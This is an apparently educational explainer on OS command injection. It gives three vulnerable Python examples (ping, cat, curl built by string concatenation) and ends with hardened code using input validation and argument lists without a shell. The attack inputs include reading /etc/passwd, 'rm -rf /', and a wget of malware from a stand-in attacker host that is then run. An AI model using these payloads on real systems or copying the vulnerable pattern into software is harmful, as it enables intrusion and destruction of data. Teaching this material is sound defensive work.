OS command injection is a type of application vulnerability that allows an attacker to execute arbitrary system commands in the context of the server process. Let's examine this in detail with three scenarios:
- Scenario 1: Network Diagnostics Tool
- Explanation: Suppose a web application provides a network diagnostic tool that lets users ping other servers and view the results. The server-side code takes the IP address from the user, appends it to the `ping` command, and executes it.
- Code: `os.system("ping " + user_input)`
- Attack: The attacker enters `8.8.8.8; cat /etc/passwd`. This executes the ping command and then lists out the contents of the /etc/passwd file, exposing sensitive information.
- Identification: You could identify this vulnerability during penetration testing by inputting command sequences (e.g., `;`, `&&`, `||`) after the IP address. If the output includes the results of the command, then the application is vulnerable.
- Scenario 2: File Retrieval System
- Explanation: A web application lets users retrieve the contents of their files. The server-side code takes a filename from the user, appends it to the `cat` command, and executes it.
- Code: `os.system("cat " + user_input)`
- Attack: The attacker inputs `important.txt; rm -rf /`. This retrieves the important.txt file and then recursively deletes every file under / that the server process has permission to remove.
- Identification: To identify this, enter a filename followed by command sequences. If the output contains the results of the command, or if the server's files are changed (in the case of a delete command), then the application is vulnerable.
- Scenario 3: Web Proxy
- Explanation: A web application provides a web proxy feature. The server-side code takes a URL from the user, appends it to the `curl` command, and executes it.
- Code: `os.system("curl " + user_input)`
- Attack: The attacker inputs `http://example.com; wget http://attacker.com/malware -O /tmp/mal_tool; chmod +x /tmp/mal_tool; /tmp/mal_tool`. This fetches the example.com webpage and then downloads a malicious tool, makes it executable, and runs it.
- Identification: During penetration testing, enter a URL followed by command sequences. If the server's behavior changes based on the command (e.g., downloading a file or changing file permissions), then the application is vulnerable.
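All three scenarios share one root cause: user input is concatenated into a string that a shell parses, so `;`, `&&` and `||` become command separators. The following is an added example, not code from the original text, showing the hardened form of Scenarios 1 and 2: the input is validated against a strict type (an IP literal, a constrained filename), and the command, if one is needed at all, is executed as an argument list with no shell involved. The function names, the `-c 1` ping option, and the `base_dir` parameter are this example's own assumptions.

```python
import ipaddress
import re
import subprocess
from pathlib import Path

# Scenario 1 hardened: accept only an IP literal, then exec ping without a shell.
def validate_ip(user_input: str) -> str:
    """Return the canonical IP string; raise ValueError for anything else."""
    # ipaddress rejects "8.8.8.8; cat /etc/passwd", hostnames, and strings
    # beginning with "-", so neither shell nor argument injection gets through.
    return str(ipaddress.ip_address(user_input.strip()))

def build_ping_argv(user_input: str) -> list:
    """Argument vector for ping; a list means no shell ever parses the input."""
    return ["ping", "-c", "1", validate_ip(user_input)]

def run_ping(user_input: str) -> str:
    # shell=False (the default) hands argv straight to execve(); ';', '&&' and
    # '||' would be ordinary bytes inside one argument, not command separators.
    result = subprocess.run(build_ping_argv(user_input), capture_output=True,
                            text=True, timeout=10, check=False)
    return result.stdout

# Scenario 2 hardened: no "cat" process at all; confine reads to one directory.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")

def resolve_user_file(base_dir: str, user_input: str) -> Path:
    """Map a user-supplied name to a file inside base_dir, or raise ValueError."""
    if not SAFE_NAME.fullmatch(user_input):
        raise ValueError("filename rejected")   # blocks ';', '/', ' ', leading '.'
    base = Path(base_dir).resolve()
    target = (base / user_input).resolve()
    if target.parent != base:                   # second check against escaping base_dir
        raise ValueError("path outside allowed directory")
    return target

def read_user_file(base_dir: str, user_input: str) -> str:
    return resolve_user_file(base_dir, user_input).read_text()

if __name__ == "__main__":
    # Constructed probes: one valid target and the two kinds of injected input.
    for probe in ("8.8.8.8", "8.8.8.8; cat /etc/passwd", "-h"):
        try:
            print(probe, "->", build_ping_argv(probe))
        except ValueError as err:
            print(probe, "-> rejected:", err)
```

The same pattern applies to Scenario 3: parse the URL with `urllib.parse`, allow only `http`/`https` schemes, and pass the result to `curl` as one list element (or fetch it with an HTTP library), never through a shell string.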